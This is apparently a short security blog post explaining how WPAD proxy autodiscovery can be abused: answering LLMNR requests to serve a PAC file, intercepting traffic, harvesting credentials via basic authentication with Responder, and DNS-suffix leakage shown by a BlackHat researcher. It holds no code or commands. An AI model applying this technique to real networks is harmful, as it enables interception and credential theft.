WPAD or Web Proxy Autodiscovery Protocol, is a protocol that is used in Windows by Internet Explorer and other web browsers that follow Window's internet configuration, that enable auto discovering of proxy server setings in order to connect to the outside, usually the Internet.
If an attacker resides in the network of the victim, he can easily respond to the LLMNR broadcast, return a PAC file and redirect the victim's trafic to his station, performing a full MITM attack.
Moreover, if the attacker adds basic authentication to his malicious server, the victim will be prompt to enter credentials and once he does, he just gave the username and password to the attacker.
This can be automatically executed using the famous Responder tool created by Spider Lab and now part of Kali.
A full example can be seen here:
But wait, the fun doesn't stop there. WPAD first issues a DNS request for WPAD hostname, and in many cases it appends the domain name to the WPAD hostname.
So effectivly if an organization that is called Contoso has a domain with the same name, and of the domain stations enable WPAD, the DNS server will get both a WPAD hostname request and a WPAD.Contoso request.
If WPAD.Contoso is a legal DNS hostname in the internet, this attack becomes FAR more dangerous as it nows leaks from the LAN to the WAN.
During the last BlackHat Las Vegas conference a researcher actually registered multiple top level domains with the WPAD hostname and different suffixes such as wpad.news, wpad.university and wpad.tokyo, hoping to get requests from different organizations. Suprisingly (or not) - he did. A LOT.
The most succesfull suffix was Tokyo, maybe because the upcoming olympics that will take place in the city in 2020.
An article about this hack can be found here:
The presentation from BlackHat can be found here:
Have a great week!